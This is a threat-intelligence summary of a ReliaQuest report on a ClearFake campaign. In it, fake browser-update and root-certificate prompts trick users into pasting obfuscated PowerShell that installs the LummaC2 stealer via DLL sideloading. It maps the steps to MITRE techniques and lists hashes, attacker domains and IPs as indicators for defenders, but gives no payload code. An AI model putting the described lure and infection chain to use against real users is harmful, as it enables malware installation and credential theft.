ReliaQuest documents a new ClearFake campaign that tricks users into manually copying and executing malicious PowerShell code to install LummaC2. The technique relies on social engineering via fake browser updates and root-certificate prompts to bypass detections, with a multi-stage PowerShell payload and DLL sideloading. #ClearFake #LummaC2 #PowerShell #DriveByDownloads #baqebei1online #cdnforfilesxyz #d1x9q8w2e4xyz
Keypoints
- ReliaQuest observed new ClearFake execution techniques that coax users into manually copying and running malicious PowerShell code.
- The PowerShell payload clears DNS cache, shows a message box, downloads additional PowerShell code, and ultimately installs LummaC2.
- This user-driven execution can bypass some detections and signatures because the code is run directly by the user rather than via a downloaded script.
- The campaign employs fake browser update prompts and a root-certificate prompt on compromised sites as social-engineering lures.
- ReliaQuest recommends blocking IoCs, limiting PowerShell use to required personnel, and educating users about this evolving method.
- Two case studies show different infection chains and how controls or user education could have prevented or mitigated the campaigns.
- Additional mitigations include WDAC/AMSI integration, domain-blocking policies, and tightening PowerShell execution policies.
MITRE Techniques
- [T1189] Drive-by Compromise – Adversary uses compromised websites hosting a fake browser error prompt to trick users into installing a root certificate. Quote: “On May 26, 2024, we first identified attacks on our customer base that began with users visiting a compromised website hosting a fake browser error prompt that asks the user to install a root certificate to fix the issue.”
- [T1204] User Execution – The adversary tricks users into manually copying and executing malicious PowerShell code. Quote: “The adversary tricks users into manually copying and executing malicious code in PowerShell.”
- [T1059.001] PowerShell – The attack flow guides the user to open a PowerShell terminal and paste the code, which then automatically executes. Quote: “Next, the user is guided through several steps to open a PowerShell terminal and paste in the code, which then automatically executes.”
- [T1027] Obfuscated/Compressed Files and Information – PowerShell code copied by the user was obfuscated using base64 encoding. Quote: “PowerShell code copied by the user was obfuscated using base64 encoding.”
- [T1105] Ingress Tool Transfer – The campaign downloads further PowerShell code and subsequent payloads (including a ZIP with MediaInfo components). Quote: “downloading further PowerShell code” and “The ZIP file contains the legitimate “MediaInfo.exe” file and the malicious DLL “MediaInfo_i386.dll”.”
- [T1574.001] DLL Side-Loading – The PowerShell script executes MediaInfo.exe and the malicious DLL via DLL sideloading. Quote: “which subsequently executes MediaInfo.exe and the malicious DLL via DLL sideloading.”
Indicators of Compromise
- [Hash] context – a467302da10ace0bf96963bcd6bdcd6a4e619e28cd477612988276dfee9f429e, 4d417cff26e83e096f6c161a10d6a72774b8bbc8948bf5b6d3156e6f17adac5f, and 2 more hashes
- [Attacker-Controlled Domains] context – baqebei1.online, cdnforfiles.xyz, and 1 more domain
- [Attacker-Controlled IP Addresses] context – 104.21.29.92, 172.67.148.183, and 1 more IP
- [Infected Websites] context – lambhuaexpress.in, soundmine.me, and other compromised sites (9 more listed in article)
Read more: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/